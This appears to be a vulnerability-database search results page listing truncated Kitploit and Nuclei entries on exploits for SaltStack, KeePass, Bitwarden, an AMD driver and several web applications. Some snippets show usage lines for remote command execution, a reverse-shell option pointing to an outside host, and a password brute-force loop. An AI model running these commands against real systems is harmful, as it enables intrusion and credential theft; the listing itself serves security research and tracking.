Lucene search
+L

7612 matches found

Kitploit
Kitploit
added 2026/08/25 10:11 p.m.2 views

CVE-2020-11651-poc

CVE-2020-11651 和 CVE-2020-11652 的 PoC 漏洞利用 这是一个基于最初检查脚本的概念验证漏洞利用。 使用它来验证您是否已成功将 Salt master 服务器更新到包含必要修复的版本。 感谢 F-Secure Labs 的研究与报告。 目前,此脚本可用于访问文件系统,并在 master 和所有连接的 minion 上调度命令。请明智地使用这些能力! 使用方法 默认操作(无参数)是获取给定 master 的 root key: root@kitploit: root@kalimah:/salt python3 exploit.py --master...

9.8CVSS0.96614EPSS
SaveExploits23References1
Kitploit
Kitploit
added 2026/08/25 5:18 p.m.1 views

cve-2023-32784

CVE-2023-32784 KeePass 2.X 2.54 版本存在一个漏洞,可能从已解锁的 KeePass 数据库的内存转储中检索出主密码。该漏洞被分配为 CVE-2023-32784 该程序旨在从正在运行的 KeePass 进程的内存转储中检索主密码。它会按位置输出潜在的字符,在一行中输出可能的密码短语,以及一个 JohnTheRipper 掩码。 安装 已安装 Go 的情况下 root@kitploit: $ go install github.com/mister-turtle/cve-2023-32784@latest 预构建二进制文件 前往 Releases 页面...

7.5CVSS5.6AI score0.04397EPSS
SaveExploits5References1
Kitploit
Kitploit
added 2026/08/25 4:13 p.m.1 views

swarm

swarm v0.6.0 English | 中文 Swarm是一个开源的模块化分布式渗透测试工具,使用分布式任务队列实现主从模式系统间的通信,使用MongoDB做数据存储。Swarm由分布式框架及各功能模块组成,其中的功能模块既可以是对某些渗透功能的全新实现,也可以是对已经存在的渗透工具的简单封装以实现其分布式的功能。在模块化架构下很容易自定义模块或者为Swarm扩展新功能。 在现在的v0.6.0版本中,Swarm实现了五个模块: 子域名扫描模块 文件扫描模块 Nmap扩展模块 站点地图爬虫模块 入侵者模块 如果你想实现自己的模块,你可以阅读这份文件. 安装...

5.4AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/08/25 4:07 p.m.2 views

CVE-2020-11652-POC

CVE-2020-11652-CVE-2020-11652-POC 这是一个针对CVE-2020-11651和CVE-2020-11651的修复POC 原始版本: https://github.com/Al1ex/CVE-2020-11652 已修复错误: TransportWarning: Unclosed transport! pip3 install salt 远程代码执行 python3 CVE-2020-11652.py --master --port --exec-choose master --exec-cmd 'whoami'...

9.8CVSS0.96614EPSS
SaveExploits23References1
Kitploit
Kitploit
added 2026/08/25 3:35 p.m.145 views

ir-rescue

ir-rescue ir-rescue is composed of two sister scripts that collect a myriad of forensic data from 32-bit and 64-bit Windows systems ir-rescue-win and from Unix systems ir-rescue-nix. The scripts respect the order of volatility and artifacts that are changed with the execution e.g. , prefetch file...

7AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/08/25 2:42 p.m.2 views

AmdRyzenMasterCheat

ECPRO-LAN 反作弊系统: FACEIT, ESEA 含自定义版本 2019年初至2020年末。R.I.P. https://h0mbre.github.io/RyzenMasterCVE/ 要求: Windows 10 企业版 1607 LTSB 并安装所有更新 AMD Ryzen 处理器 主板 B350-B450(B550 客户端有 bug) 已安装 Logitech GHUB(用于鼠标输入) 旧代 Ryzen 处理器可能使用不同版本的 AmdRyzenMaster 驱动 1.3.0.0 你随后需要替换...

5.6AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/08/25 1:54 p.m.1 views

CVE-2023-32784-EXPLOIT-REPORT

CVE-2023-32784 漏洞利用演示 项目概述 本仓库演示了 CVE-2023-32784,这是 KeePass 2.54 之前版本中存在的一个严重漏洞。该漏洞可通过内存转储恢复主密码,从而暴露存储的凭据。本文档逐步说明了如何搭建漏洞利用环境、执行 PoC 工具以及理解缓解策略。 漏洞详情 描述 CVE-2023-32784 是 KeePass 2.0 至 2.53 版本中存在的一个内存泄漏漏洞,源于 KeePass 的 Secure Textbox EX 组件对字符串处理不当。主密码中输入的每个字符都会在内存中留下痕迹,从而可通过内存转储恢复密码。 主要特征: 严重性:高...

7.5CVSS8.5AI score0.04397EPSS
SaveExploits5References1
Kitploit
Kitploit
added 2026/08/25 1:49 p.m.2 views

CVE-2023-24055

CVE-2023-24055 CVE-2023-24055 的 POC 和扫描器 使用风险自负! configscanner.py 一个简单的解析器,用于运行在 Windows 下的 KeePass 配置文件。 该工具将打开目录 %APPDATA%\Roaming\KeePass\KeePass.config.xml 并输出所有触发器。这些触发器 执行命令行/URL 将活动数据库与文件/URL同步 导出活动数据库 被标记为危险。这是我个人的看法,我相信你也可以通过其他一些操作执行恶意行为! 提示:如果你不认识某些触发器,请仔细检查它们! poc.py CVE-2023-24055...

5.5CVSS6.4AI score0.03691EPSS
SaveExploits2References1
Kitploit
Kitploit
added 2026/08/25 12:25 p.m.1 views

CVE-2020-12928

CVE-2020-12928 LPE 利用代码 本仓库仅供学习目的 . 演示 参考: https://h0mbre.github.io/RyzenMasterCVE/ https://movaxbx.ru/2020/10/14/cve-2020-12928-exploit-proof-of-concept-privilege-escalation-in-amd-ryzen-master-amdryzenmasterdriver-sys/ https://hackyboiz.github.io/2021/08/11/l0ch/windows-driver-part4/...

7.8CVSS7.5AI score0.01302EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/08/25 10:42 a.m.2 views

bw-dump

BW-Dump 更新2 :此漏洞被分配了 CVE-2023-38840。 更新 :GitHub 上已发布了一个拉取请求(5813)的补丁,修复了该漏洞。受影响的版本是 Bitwarden Desktop 2023.7.0 及以下版本。 描述 一个概念验证工具,可从锁定状态的 Bitwarden 密码库中提取主密码(密码库必须至少解锁过一次)。此工具仅适用于当前会话,系统重启后将无法使用。不需要 管理员权限。 已发布一篇博客文章,可在此处查看:https://redmaple.tech/blogs/2023/extract-bitwarden-vault-passwords/ 演示 使用...

5.5CVSS5.8AI score0.00516EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/08/25 7:49 a.m.1 views

KeePass-dump-py

KeePass-dump-py Mi intento de reescribir el POC original de KeePass 2.X Master Password Dumper CVE-2023-32784 en python. Por favor, dirígete al POC original para más detalles sobre la vulnerabilidad y el proceso de explotación. Lo que hace este script: 1. Comprueba si el proceso de KeePass está e...

7.5CVSS8AI score0.04397EPSS
SaveExploits5References1
Kitploit
Kitploit
added 2026/08/25 7:48 a.m.3 views

CVE-2020-11651-PoC

CVE-2020-11651-PoC Repositorio que contiene un exploit para CVE-2020-11651 actualizado para funcionar con las últimas versiones de Python y manejar los errores de conexión. COPIA DEL README DEL REPOSITORIO ORIGINAL Original Repository Exploit PoC para CVE-2020-11651 y CVE-2020-11652 Este es un...

9.8CVSS8.2AI score0.96614EPSS
SaveExploits23References2
Kitploit
Kitploit
added 2026/08/25 6:11 a.m.2 views

CVE-2023-32784-keepass-linux

KeePass 2.53/cmdline 文件,并存储命令行参数中包含关键字 KeePass 的进程的 pid。 然后,它会获取 /proc//maps 中未直接关联库(即文件路径为空)的内存映射的地址。 接着,它利用 /proc//mem 将所有映射的内存存储到缓冲区中。这是在 Linux 上转储任意进程内存的一种基本行为。 它会解析内存,尝试查找用户输入主密码时留下的残存字符串,这些字符串看起来像 •a, ••s, •••s 这样的序列。第一个字符会缺失。您可以通过查看代码找到其他功能。 gcc dumppwd.c -o dump 然后就可以运行了。...

7.5CVSS8.3AI score0.04397EPSS
SaveExploits5References1
Nuclei
Nuclei
added 2026/08/25 6:03 a.m.31 views

ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection

ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the albumid parameter in the /photo-gallery/api/album/treelists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further...

9.8CVSS9.3AI score0.11176EPSS
SaveExploits7References2
Nuclei
Nuclei
added 2026/08/25 6:03 a.m.106 views

TerraMaster TOS < 4.2.06 - User Enumeration

User Enumeration vulnerability in TerraMaster TOS = 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. id: CVE-2020-28185 info: name: TerraMaster TOS 4.2.06 - User Enumeration author: pussycat0x severity:...

5.3CVSS5.6AI score0.18253EPSS
SaveExploits1References5
Nuclei
Nuclei
added 2026/08/25 6:03 a.m.83 views

Apache Spark - Authentication Bypass

In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication spark.authenticate via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even...

9.8CVSS7.7AI score0.2937EPSS
SaveExploits0References2
Nuclei
Nuclei
added 2026/08/25 6:03 a.m.31 views

Quiz and Survey Master <= 8.1.4 - SQL Injection

ExpressTech Quiz And Survey Master versions up to 8.1.4 contains an SQL injection caused by improper neutralization of special elements used in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires user interaction. id: CVE-2023-28787 info: name: Quiz and Survey Master =...

9.3CVSS9.3AI score0.0196EPSS
SaveExploits0References3
Nuclei
Nuclei
added 2026/08/25 6:03 a.m.18 views

LiteLLM < 1.25.0 - Remote Code Execution

LiteLLM before 1.25.0 allows authenticated users with the master API key to execute arbitrary Python code through the /guardrails/testcustomcode endpoint intended for custom guardrail testing. The endpoint’s insufficient filtering mechanisms can be bypassed, allowing attackers to abuse Python’s...

8.8CVSS6.3AI score0.06496EPSS
SaveExploits2References3
Kitploit
Kitploit
added 2026/08/25 5:43 a.m.1 views

CVE-2023-32784

keepass-dump-masterkey 用法 python3 poc.py 预览 提醒一下,转储中找不到第一个字符,而对于第二个字符,脚本只会给出几种可能性。无论如何,我们建议您使用下面的脚本对2个字符进行暴力破解: root@kitploit: !/bin/sh Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt wordlist with 2 char while read i do echo "Using password: "$i"" echo "$i" | kpcli --kdb=$1 && exit 0 done...

7.5CVSS7.7AI score0.04397EPSS
SaveExploits5References1
Kitploit
Kitploit
added 2026/08/25 5:26 a.m.2 views

CVE-2020-11652

SaltStack-Exp CVE-2020-11651 CVE-2020-11652 执行主控端: root@kitploit: python exp.py --exec-choose master --exec-cmd "whoami" 执行被控端: root@kitploit: python exp.py --exec-choose minions --exec-cmd "whoami" 获取Shell: root@kitploit: python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444 读取文件: root@kitploit...

9.8CVSS0.96614EPSS
SaveExploits23References1
Rows per page
Query Builder